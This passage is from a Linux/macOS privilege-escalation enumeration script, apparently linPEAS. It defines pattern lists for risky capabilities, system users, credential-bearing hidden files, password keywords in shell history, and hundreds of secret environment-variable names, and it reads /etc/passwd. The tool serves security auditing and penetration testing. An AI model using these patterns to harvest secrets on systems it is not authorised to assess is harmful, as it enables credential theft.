   1133 cap_net_raw:python|tcpdump|dumpcap|tcpflow"
   1134 
   1135 capsB="=ep|cap_chown|cap_fowner|cap_fsetid|cap_setpcap|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_sys_rawio|cap_bpf|cap_perfmon"
   1136 
   1137 ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
   1138 
   1139 profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
   1140 
   1141 mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
   1142 
   1143 knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+'
   1144 
   1145 if [ "$MACPEAS" ]; then
   1146   sh_usrs="ImPoSSssSiBlEee"
   1147   nosh_usrs="ImPoSSssSiBlEee"
   1148   dscl . list /Users | while read uname; do
   1149     ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
   1150     if  grep -q \"$ushell\" /etc/shells; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi
   1151   done
   1152 else
   1153   sh_usrs=$(cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[[:space:]:]|^bin$|/' | sed 's/|sys|/|sys[[:space:]:]|^sys$|/' | sed 's/|daemon|/|daemon[[:space:]:]|^daemon$|/')"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere
   1154   nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[[:space:]:]|^bin$|/')"ImPoSSssSiBlEee"
   1155 fi
   1156 
   1157 notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$"
   1158 
   1159 notBackup="/tdbbackup$|/db_hotbackup$"
   1160 
   1161 INT_HIDDEN_FILES=".Xauthority|.asc|.bashrc|.bluemix|.boto|.cer|.claude|.claude.json|.cloudflared|.codex|.credentials.json|.crt|.csr|.cursor|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.gemini|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.maintenance|.mcp.json|.mozilla|.msmtprc|.mylogin.cnf|.ovpn|.p12|.password-store|.pcap|.pcapng|.pem|.pfx|.pgp|.pgpass|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc"
   1162 
   1163 shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
   1164 
   1165 pwd_inside_history="az login|enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|roadrecon auth|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|Save-AzContext|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:|chpasswd"
   1166 
   1167 knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|mmyangfl@gmail.com|rogershimizu@gmail.com|thmarques@gmail.com"
   1168 
   1169 pwd_inside_history="az login|enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|roadrecon auth|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|Save-AzContext|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:|chpasswd"
   1170 
   1171 pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID"
   1172 pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID"
   1173 pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION"
   1174 pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|DATABASE_PASSWORD|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId"
   1175 pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER"
   1176 pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER"
   1177 pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET"
   1178 pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY"
   1179 pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY"
   1180 pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS"
   1181 pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY|USERNAME|PASSWORD|PASSWD|CREDENTIALS?"
   1182 
